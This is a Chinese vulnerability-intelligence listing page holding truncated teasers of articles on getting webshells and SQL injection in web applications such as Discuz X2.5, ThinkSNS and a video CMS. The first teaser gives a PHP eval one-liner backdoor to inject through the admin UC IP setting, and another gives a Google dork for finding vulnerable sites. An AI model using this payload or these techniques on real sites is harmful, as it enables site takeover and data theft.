漏洞情报 - 第 31 页

Discuz X2.5后台最新拿webshell【转】

第一：我们进入后台已管理员身份就可以然后打开站长→UC设置看截图在UCip地址里面填写经过处理的一句话如下 Madman');eval($_POST[a])?>;// QQ 然后保存 ...

6,636

includedialogconfig.php //检验用户登录状态 $cuserLogin = new userLogin(); if($cuserLogin->getUserID()==- ...

15,985

经过楼主的测试，可以通杀2.0——2.8版本。未经同意，禁止转载。程序名称：ThinkSNS 影响版本： 2.0——2.8 漏洞类型：后台拿shell 漏洞位置：全局-附件设置版本确定： 1 ...

6,854

# Exploit:Membris v 2.0.1 Sql XSS & 文件暴露 # Google Dork: Powered by Membris v 2.0.1 # Date: Dr.abola ...

4,744

文章由LN撰写。前段时间做学校的比赛题目，碰到了simple-log博客程序，到了后台需要拿webshell，但是网上的在模板哪儿写入一句话被管理员做了处理，没法直接写入了，但是可以抓包修改，这个不 ...

4,266

前几天公布了飞飞影视php版的SQL注入漏洞。飞飞影视官方论坛挂上了我们08安全团队的友连，在此感谢！其实也个版本也算不是一个漏洞，只是利用有些站长懒惰不去修改默认管理员认证码，结合cookie ...

7,363

...

4,959